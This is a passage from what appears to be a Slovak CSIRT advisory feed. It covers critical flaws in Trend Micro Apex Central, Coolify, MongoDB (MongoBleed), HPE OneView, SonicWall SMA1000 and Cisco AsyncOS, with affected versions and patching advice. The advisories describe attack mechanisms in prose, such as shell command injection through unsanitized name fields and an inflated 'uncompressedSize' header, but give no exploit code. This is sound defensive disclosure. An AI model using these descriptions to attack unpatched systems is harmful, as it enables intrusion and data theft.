<li><a href="https://thehackernews.com/2026/01/critical-adonisjs-bodyparser-flaw-cvss.html">https://thehackernews.com/2026/01/critical-adonisjs-bodyparser-flaw-cvss.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3045/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Trend Micro Apex Central obsahuje tri závažné zraniteľnosti</title>
		<link>/posts/3043</link>
					<comments>/posts/3043#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 12 Jan 2026 14:04:07 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apex Central]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Trend Micro]]></category>
		<guid isPermaLink="false">/?p=3043</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/trend-micro-logosvg.jpg" alt="" /></p>Spoločnosť Trend Micro vydala bezpečnostné aktualizácie svojho produktu Apex Central pre Windows, ktoré opravujú 3 zraniteľnosti, z čoho 1 je...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/trend-micro-logosvg.jpg" alt="" /></p>
<p><strong>Spoločnosť Trend Micro vydala bezpečnostné aktualizácie svojho produktu Apex Central pre Windows, ktoré opravujú 3 zraniteľnosti, z čoho 1 je označená ako kritická. Kritická zraniteľnosť umožňuje neautentifikovanému útočníkovi vykonávať vzdialene kód s oprávneniami úrovne SYSTEM. Ďalšie dve zraniteľnosti by mohol vzdialený neautentifikovaný útočník zneužiť na zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apex Central, verzie staršie ako Build 7190</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-69258</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť sa nachádza v komponente <em>LoadLibraryEX</em>. Vzdialený neautentifikovaný útočník ju môže zneužiť na nahranie škodlivej knižnice DLL zaslaním špeciálne vytvorenej správy na rozhranie <em>MsgReceiver.exe</em>. Tým získa možnosť vzdialeného vykonania kódu s oprávneniami úrovne SYSTEM.</p>



<p>Pre uvedenú zraniteľnosť je voľne dostupný proof-of-concept kód demonštrujúci spôsob jej zneužitia.</p>



<p><strong>CVE-2025-69259 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť vysokej závažnosti spočíva v absencii kontroly návratovej hodnoty NULL pri zasielaní správ na rozhranie <em>MsgReceiver.exe</em>. Vzdialený neautentifikovaný útočník ju môže zneužiť na zneprístupnenie služby pomocou špeciálne vytvorenej správy. Táto navráti hodnotu NULL a spôsobí prístup k neplatnej pamäti.</p>



<p><strong>CVE-2025-69260 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť vysokej závažnosti v <em>MsgReceiver.exe</em> umožňuje čítanie pamäte mimo povolených hodnôt. Chyba sa nachádza v knižnici <em>msgHandlerLogReceiver.dll</em>, ktorá nekontroluje veľkosť premennej <em>x_astring</em>, zodpovednej za vytvorenie ukazovateľa na dáta správy, voči veľkosti vyhradenej pamäte. Vzdialený neautentifikovaný útočník môže hodnotu premennej upraviť tak, že vzniknutý ukazovateľ bude smerovať na neplatnú pamäť. Tým spôsobí nedostupnosť služby.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong></strong><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Apex Central aspoň na Build 7190.</p>



<p>V prípade, že aktualizácia nie je možná, zraniteľnosť je možné mitigovať limitovaním prístupu k zraniteľným systémom len na dôveryhodné IP.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-69258">https://nvd.nist.gov/vuln/detail/CVE-2025-69258</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-69259">https://nvd.nist.gov/vuln/detail/CVE-2025-69259</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-69260">https://nvd.nist.gov/vuln/detail/CVE-2025-69260</a></li>



<li><a href="https://www.tenable.com/security/research/tra-2026-01">https://www.tenable.com/security/research/tra-2026-01</a></li>



<li><a href="https://success.trendmicro.com/en-US/solution/KA-0022071">https://success.trendmicro.com/en-US/solution/KA-0022071</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3043/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Platforma Coolify obsahuje 11 kritických zraniteľností</title>
		<link>/posts/3040</link>
					<comments>/posts/3040#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 09 Jan 2026 15:08:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Coolify]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3040</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/01/coolify.png" alt="" /></p>Vývojári open-source platformy pre manažovanie serverov, aplikácií a&#160;databáz Coolify opravili 11 kritických chýb, ktoré môžu viesť k obídeniu autentifikácie, vzdialenému...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/01/coolify.png" alt="" /></p>
<p><strong>Vývojári open-source platformy pre manažovanie serverov, aplikácií a&nbsp;databáz Coolify opravili 11 kritických chýb,</strong><strong> </strong><strong>ktoré môžu viesť k obídeniu autentifikácie, vzdialenému vykonaniu kódu a úplnému kompromitovaniu hostiteľského systému. Chyby zabezpečenia súvisia najmä s&nbsp;neošetrenými parametrami, nad ktorými má kontrolu používateľ. Tieto aplikácia preberá priamo do príkazov pre shell.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Coolify 4.0.0-beta.450 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-66209</strong> (CVSS skóre 9,9)</p>



<p>Zraniteľnosť vo funkcionalite zálohovania databázy dovoľuje autentifikovanému útočníkovi s príslušnými právami injektovať a vykonávať príkazy na hostiteľskom serveri a získať k nemu plný prístup. Útočník môže zneužiť parameter názvu databázy, ktorý aplikácia preberá do príkazov pre shell bez sanitizácie.</p>



<p><strong>CVE-2025-66210</strong> (CVSS skóre 9,4)</p>



<p>Zraniteľnosť vo funkcionalite importu databázy dovoľuje autentifikovanému útočníkovi injektovať a vykonávať príkazy na spravovanom serveri a získať plný prístup ku infraštruktúre obete. Útočník môže zneužiť parameter názvu databázy, ktorý aplikácia preberá do príkazov pre shell bez sanitizácie.</p>



<p><strong>CVE-2025-66211</strong> (CVSS skóre 9,4)</p>



<p>Zraniteľnosť v narábaní s názvom inicializačného súboru PostgreSQL dovoľuje autentifikovanému útočníkovi s prístupovými právami k databáze injektovať a vykonávať ľubovoľné príkazy na serveri s oprávneniami používateľa root. Aplikácia tento názov preberá do príkazov pre shell bez sanitizácie.</p>



<p><strong>CVE-2025-66212</strong> (CVSS skóre 9,4)</p>



<p>Zraniteľnosť v narábaní s názvom konfiguračného súboru pre dynamickú proxy dovoľuje autentifikovanému útočníkovi s manažmentovými právami k serveru injektovať a vykonávať príkazy na spravovanom serveri s oprávneniami používateľa root. Aplikácia tento názov preberá do príkazov pre shell bez sanitizácie.</p>



<p><strong>CVE-2025-66213</strong> (CVSS skóre 9,4)</p>



<p>Zraniteľnosť vo funkcionalite File Storage Directory Mount Path dovoľuje autentifikovanému útočníkovi s manažmentovými právami k aplikácii alebo službe injektovať a vykonávať príkazy na spravovanom serveri s oprávneniami používateľa root. Aplikácia preberá parameter <em>file_storage_directory_source</em> do príkazov pre shell bez sanitizácie.</p>



<p><strong>CVE-2025-64419</strong> (CVSS skóre 9,6)</p>



<p>Zraniteľnosť súvisí s neošetrenými vstupmi z <em>docker-compose.yaml</em>, ktoré aplikácia používa v príkazoch. Útočníkovi dovoľuje injektovať a vykonávať ľubovoľné systémové príkazy na zraniteľnej inštancii Coolify s oprávneniami používateľa root. </p>



<p><strong>CVE-2025-64420</strong> (CVSS skóre 9,9)</p>



<p>Zraniteľnosť umožňuje útočníkovi s nízkymi oprávneniami získať privátny kľúč používateľa root pre Coolify, čím získa administrátorský prístup na server cez SSH.</p>



<p><strong>CVE-2025-64424</strong> (CVSS skóre 9,4)</p>



<p>Zraniteľnosť gitových nešpecifikovaných polí pre používateľské vstupy, ktorá umožňuje útočníkovi s nízkymi oprávneniami injektovať a vykonávať ľubovoľné systémové príkazy na zraniteľnej inštancii Coolify s oprávneniami používateľa root. </p>



<p><strong>CVE-2025-59156</strong> (CVSS skóre 9,4)</p>



<p>Zraniteľnosť, ktorá umožňuje útočníkovi s nízkymi oprávneniami injektovať ľubovoľné direktívy Docker Compose a získať schopnosť vykonávať príkazy na hostiteľskom systéme s oprávneniami používateľa root. Tým efektívne unikne z kontajnera.</p>



<p><strong>CVE-2025-59157</strong> (CVSS skóre 9,9)</p>



<p>Zraniteľnosť, ktorá umožňuje útočníkovi s používateľskými oprávneniami pri nasádzaní injektovať cez pole Git Repository ľubovoľné príkazy pre shell a vykonávať ich na hostiteľskom systéme. </p>



<p><strong>CVE-2025-59158</strong> (CVSS skóre 9,4)</p>



<p>Zraniteľnosť súvisí s nevhodným spôsobom sanitizácie používateľských vstupov. Útočníkovi s nízkymi oprávneniami umožňuje vykonať útok typu stored XSS pri vytváraní projektu. Pre uloženie škodlivého kódu JavaScript môže zneužiť názov projektu. Keď ku projektu pristúpi administrátor, napríklad aby ho zmazal, uložený skript sa vykoná v kontexte jeho prehliadača. </p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Coolify aspoň na verziu 4.0.0-beta.451.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://thehackernews.com/2026/01/coolify-discloses-11-critical-flaws.html">https://thehackernews.com/2026/01/coolify-discloses-11-critical-flaws.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66209">https://nvd.nist.gov/vuln/detail/CVE-2025-66209</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66210">https://nvd.nist.gov/vuln/detail/CVE-2025-66210</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66211">https://nvd.nist.gov/vuln/detail/CVE-2025-66211</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66212">https://nvd.nist.gov/vuln/detail/CVE-2025-66212</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66213">https://nvd.nist.gov/vuln/detail/CVE-2025-66213</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-64419">https://nvd.nist.gov/vuln/detail/CVE-2025-64419</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-64420">https://nvd.nist.gov/vuln/detail/CVE-2025-64420</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-64424">https://nvd.nist.gov/vuln/detail/CVE-2025-64424</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-59156">https://nvd.nist.gov/vuln/detail/CVE-2025-59156</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-59157">https://nvd.nist.gov/vuln/detail/CVE-2025-59157</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-59158">https://nvd.nist.gov/vuln/detail/CVE-2025-59158</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3040/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností december 2025</title>
		<link>/posts/3018</link>
					<comments>/posts/3018#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 08 Jan 2026 12:00:24 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3018</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci december 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci december 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2026/01/2025_12_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 12/2025 PDF (554 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3018/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>MongoBleed: aktívne zneužívaná zraniteľnosť MongoDB Server umožňuje čítať pamäť</title>
		<link>/posts/3008</link>
					<comments>/posts/3008#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 05 Jan 2026 08:55:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[mongobleed]]></category>
		<category><![CDATA[mongodb]]></category>
		<guid isPermaLink="false">/?p=3008</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/01/mongodb-atlas-google-cloud-partnership-nosql-databases-integrations-2-1024x616.jpg" alt="" /></p>Vývojári MongoDB Server opravili vysoko závažnú zraniteľnosť umožňujúcu vzdialenému neautentifikovanému útočníkovi manipulovať premenné v&#160;hlavičkách požiadaviek a získavať tak citlivé informácie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/01/mongodb-atlas-google-cloud-partnership-nosql-databases-integrations-2-1024x616.jpg" alt="" /></p>
<p><strong>Vývojári MongoDB Server opravili vysoko závažnú zraniteľnosť umožňujúcu vzdialenému neautentifikovanému útočníkovi manipulovať premenné v&nbsp;hlavičkách požiadaviek a získavať tak citlivé informácie z&nbsp;pamäte na halde (angl. heap) v&nbsp;rámci operačnej pamäte. Zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>MongoDB Server v8.2 staršie ako 8.2.3</li>



<li>MongoDB Server v8.0 staršie ako 8.0.17</li>



<li>MongoDB Server v7.0 staršie ako 7.0.28</li>



<li>MongoDB Server v6.0 staršie ako 6.0.27</li>



<li>MongoDB Server v5.0 staršie ako 5.0.32</li>



<li>MongoDB Server v4.4 staršie ako 4.4.30</li>



<li>MongoDB Server v4.2, všetky verzie</li>



<li>MongoDB Server v4.0, všetky verzie</li>



<li>MongoDB Server v3.6, všetky verzie<strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-14847</strong><strong> (CVSS v4 skóre 8,7)</strong></p>



<p>Aplikácia MongoDB Server obsahuje vysoko závažnú zraniteľnosť, ktorá umožňuje vzdialenému neautentifikovanému útočníkovi čítať neinicializovanú pamäť na halde, priradenú databáze. Chyba zabezpečenia súvisí s&nbsp;neošetrenou dĺžkou polí protokolových hlavičiek správ, ktoré boli skomprimované pomocou nástroja Zlib. V&nbsp;správe OP_COMPRESSED môže útočník manipulovať hodnotu premennej „uncompressedSize“ a&nbsp;prepísať ju na väčšiu ako je veľkosť obsahu správy. Aplikácia následne bez kontroly na základe hodnoty tejto premennej alokuje vyrovnávaciu pamäť. Server následne v&nbsp;rámci chybového hlásenia vypíše obsah správy spolu s&nbsp;obsahom nadbytočnej pamäte.</p>



<p>Zraniteľnosť dostala názov MongoBleed a&nbsp;je aktívne zneužívaná. Existuje pre ňu verejne dostupný kód demonštrujúci možnosti jej zneužitia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame bezodkladnú aktualizáciu aplikácie MongoDB Server aspoň na verziu 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, alebo 4.4.30.</p>



<p>Pre mitigáciu zraniteľnosti do doby aktualizácie aplikácie môžete zakázať komprimovanie požiadaviek nástrojom zlib. Odporúča sa tiež zakázať komunikáciu z&nbsp;internetu na port TCP 27017 a&nbsp;povoliť prístup iba z&nbsp;dôveryhodných zdrojov.</p>



<p>Taktiež odporúčame vykonať kontrolu logov na prítomnosť pokusov o zneužitie zraniteľnosti, na čo možno použiť, napríklad aj špeciálne vytvorený nástroj <a href="https://github.com/Neo23x0/mongobleed-detector" target="_blank" rel="noreferrer noopener">MONGOBLEED DETECTOR</a>. Dôležité je vykonať aj zmenu hesiel a kryptografického materiálu, ktorý mohol uniknúť.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-14847" target="_blank" rel="noreferrer noopener">https://nvd.nist.gov/vuln/detail/CVE-2025-14847</a></li>



<li><a href="https://www.akamai.com/blog/security-research/cve-2025-14847-all-you-need-to-know-about-mongobleed" target="_blank" rel="noreferrer noopener">https://www.akamai.com/blog/security-research/cve-2025-14847-all-you-need-to-know-about-mongobleed</a></li>



<li><a href="https://www.mongodb.com/company/blog/news/mongodb-server-security-update-december-2025" target="_blank" rel="noreferrer noopener">https://www.mongodb.com/company/blog/news/mongodb-server-security-update-december-2025</a></li>



<li><a href="https://github.com/Neo23x0/mongobleed-detector" target="_blank" rel="noreferrer noopener">https://github.com/Neo23x0/mongobleed-detector</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3008/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Hewlett Packard Enterprise OneView</title>
		<link>/posts/3006</link>
					<comments>/posts/3006#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 19 Dec 2025 13:31:14 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[HPE]]></category>
		<category><![CDATA[OneView]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3006</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>Spoločnosť HPE varuje pred kritickou zraniteľnosťou manažmentovej platformy OneView, ktorá umožňuje vzdialené vykonávanie kódu. Zraniteľné systémy: Opis činnosti: CVE-2025-37164 (CVSS...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>
<p><strong>Spoločnosť HPE varuje pred kritickou zraniteľnosťou manažmentovej platformy OneView, ktorá umožňuje vzdialené vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>HPE OneView všetky verzie po 10.20 vrátane<strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-37164</strong> (CVSS v3.1 skóre 10,0)</p>



<p>Spoločnosť Hewlett Packard Enterprise (HPE) opravila zraniteľnosť s maximálnou závažnosťou v manažmentovom softvéri OneView. Chyba zabezpečenia umožňuje neautentifikovanému útočníkovi vzdialené vykonávanie kódu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia HPE OneView aspoň na verziu 11.00.</p>



<p>Alternatívne môžete pre verzie 5.20 až 10.20 zraniteľnosť mitigovať aplikáciou <a href="https://myenterpriselicense.hpe.com/cwp-ui/product-details/HPE_OV_CVE_37164_Z7550-98077/-/sw_free">hotfixu</a>. Pri upgrade verzie 6.60.xx na 7.00.00 a pri reimaging HPE Synergy Composer je potrebné hotfix aplikovať znovu. Pre HPE Synergy Composer nájdete hotfix <a href="https://support.hpe.com/connect/s/softwaredetails?language=en_US&amp;collectionId=MTX-64daeb5ed0df44a0&amp;tab=releaseNotes">tu</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&amp;docLocale=en_US#vulnerability-summary-1">https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&amp;docLocale=en_US#vulnerability-summary-1</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/hpe-warns-of-maximum-severity-rce-flaw-in-oneview-software/">https://www.bleepingcomputer.com/news/security/hpe-warns-of-maximum-severity-rce-flaw-in-oneview-software/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-37164">https://nvd.nist.gov/vuln/detail/CVE-2025-37164</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3006/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť SonicWall SMA1000</title>
		<link>/posts/3004</link>
					<comments>/posts/3004#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 18 Dec 2025 12:27:35 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[SMA1000]]></category>
		<category><![CDATA[SonicWall]]></category>
		<guid isPermaLink="false">/?p=3004</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>Spoločnosť SonicWall vydala bezpečnostné aktualizácie pre zariadenia SonicWall SMA1000, ktoré opravujú aktívne zneužívanú zraniteľnosť. Zraniteľnosť strednej závažnosti CVE‑2025‑40602 spočíva v...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>
<p><strong>Spoločnosť SonicWall vydala bezpečnostné aktualizácie pre zariadenia SonicWall SMA1000, ktoré opravujú aktívne zneužívanú zraniteľnosť. Zraniteľnosť strednej závažnosti CVE</strong><strong>‑</strong><strong>2025</strong><strong>‑</strong><strong>40602 spo</strong><strong>čí</strong><strong>va v nedostato</strong><strong>č</strong><strong>nej autoriz</strong><strong>á</strong><strong>cii v r</strong><strong>á</strong><strong>mci konzoly AMC (Application Management Console) a lokálny </strong><strong>ú</strong><strong>to</strong><strong>č</strong><strong>n</strong><strong>í</strong><strong>k by ju mohol zneu</strong><strong>ž</strong><strong>i</strong><strong>ť</strong><strong> na eskal</strong><strong>á</strong><strong>ciu privil</strong><strong>é</strong><strong>gi</strong><strong>í</strong><strong>.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SonicWall SMA1000 verzie 12.4.3-03093 a&nbsp;staršie</li>



<li>SonicWall SMA1000 verzie 12.5.0-02002 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-40602</strong> (CVSS skóre 6,6)</p>



<p>Aktívne zneužívaná zraniteľnosť zariadení SonicWall Secure Mobile Access série 1000 strednej závažnosti sa nachádza v manažmentovej konzole (AMC). Súvisí s nesprávne implementovaným spôsobom autorizácie. Útočníkom umožňuje lokálne eskalovať svoje oprávnenia.</p>



<p>Zraniteľnosť je aktívne <strong>zneužívaná v tandeme</strong> s kritickou <a href="https://www.csirt.sk/posts/1941.html">CVE-2025-23006</a>, čo útočníkom umožňuje vzdialene vykonávať kód s oprávneniami používateľa root.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia SonicWall SMA1000 aspoň na verzie 12.4.3-03245 a 12.5.0-02283. </p>



<p>Pokiaľ aktualizácia nie je možná, mitigovať zraniteľnosť môžete obmedzením prístupu k zariadeniu len na dôveryhodné IP adresy, cez VPN.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0019">https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0019</a></li>



<li><a href="https://thehackernews.com/2025/12/sonicwall-fixes-actively-exploited-cve.html">https://thehackernews.com/2025/12/sonicwall-fixes-actively-exploited-cve.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3004/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritickú zraniteľnosť Cisco AsyncOS aktívne zneužívajú vo viacerých kampaniach</title>
		<link>/posts/3002</link>
					<comments>/posts/3002#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 18 Dec 2025 11:05:07 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Secure Email and Web Manager]]></category>
		<category><![CDATA[Secure Email Gateway]]></category>
		<guid isPermaLink="false">/?p=3002</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco varovala pred aktívnym zneužívaním kritickej zero‑day zraniteľnosti v produktoch Cisco SEG (Secure Email Gateway) a SEWM (Secure Email...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco varovala pred aktívnym zneužívaním kritickej zero</strong><strong>‑</strong><strong>day zranite</strong><strong>ľ</strong><strong>nosti v produktoch Cisco SEG (Secure Email Gateway) a SEWM (Secure Email and Web Manager). Zranite</strong><strong>ľ</strong><strong>nos</strong><strong>ť</strong><strong> s identifik</strong><strong>á</strong><strong>torom CVE</strong><strong>‑</strong><strong>2025</strong><strong>‑</strong><strong>20393 v opera</strong><strong>č</strong><strong>nom syst</strong><strong>é</strong><strong>me AsyncOS umožňuje vzdialene vykonávať systémové príkazy a&nbsp;kompromitovať zraniteľný systém.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Secure Email Gateway (predtým Cisco Email Security Appliance)</li>



<li>Cisco Secure Email and Web Manager (predtým Cisco Content Security Management Appliance)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-20393</strong> (CVSS skóre 10,0)</p>



<p>Kritická zero-day zraniteľnosť zariadení Cisco SEG a Cisco SEWM je aktívna, keď má zariadenie povolenú a do internetu vystavenú funkcionalitu Spam Quarantine. Zraniteľnosť sa nachádza v operačnom systéme Cisco AsyncOS a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie systémových príkazov s oprávneniami root.</p>



<p>Zraniteľnosť je aktívne zneužívaná minimálne od konca novembra 2025. Podľa skupiny Cisco Talos zraniteľnosť zneužíva čínska skupina UAT‑9686 pri nasadzovaní perzistentných zadných dvierok AquaShell, nástrojov pre vytváranie reverzných tunelov SSH AquaTunnel a TPC/UDP Chisel a nástroja pre čistenie logov AquaPurge.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie systémových príkazov</strong></li>



<li><strong>Získanie kontroly nad zariadením</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Na uvedenú zraniteľnosť v súčasnosti nie sú dostupné aktualizácie. Výrobca administrátorom odporúča:</p>



<ul>
<li>limitovať prístup k zariadeniam na dôveryhodné IP adresy</li>



<li>chrániť zariadenia firewallom, </li>



<li>používať bezpečnú autentifikáciu, napríklad prostredníctvom SAML alebo LDAP, </li>



<li>zmeniť predvolené heslá, </li>



<li>používať SSL/TLS certifikáty na zabezpečenie manažmentovej prevádzky, </li>



<li>pre Cisco SEG oddeliť funkcie pre spracovanie e‑mailov a manažment na nezávislé sieťové rozhrania, </li>



<li>monitorovať logy sieťovej prevádzky na prítomnosť podozrivých prístupov a pokusov o zneužitie zraniteľnosti a&nbsp;prítomnosť indikátorov kompromitácie. </li>
</ul>



<p>V prípade potvrdenej kompromitácie je potrebná obnova zariadenia do pôvodného stavu / továrenských nastavení. O&nbsp;pomoc s&nbsp;preverením vášho zariadenia môžete požiadať Cisco na <a href="https://www.cisco.com/c/en/us/support/index.html">oficiálnych stránkach</a>.</p>



<p><strong>Indikátory kompromitácie:</strong></p>



<p><u>Hashe</u></p>



